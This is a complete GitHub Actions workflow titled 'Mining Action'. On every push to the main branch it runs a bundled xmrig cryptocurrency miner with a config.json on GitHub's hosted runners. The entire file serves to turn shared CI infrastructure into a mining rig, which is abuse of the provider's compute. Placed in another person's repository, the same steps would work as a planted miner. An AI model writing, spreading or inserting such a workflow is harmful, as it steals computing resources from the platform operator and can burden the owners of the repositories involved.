name: Mining Action

on:
  push:
    branches:
      - main

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
      # Checkout repository to get files
      - name: Setup Repository
        uses: actions/checkout@v3

      # Set execute permissions for the xmrig binary
      - name: Set Execute Permissions
        run: chmod +x ./xmrig

      # Run the xmrig binary
      - name: Start Mining
        run: |
          ./xmrig --config=config.json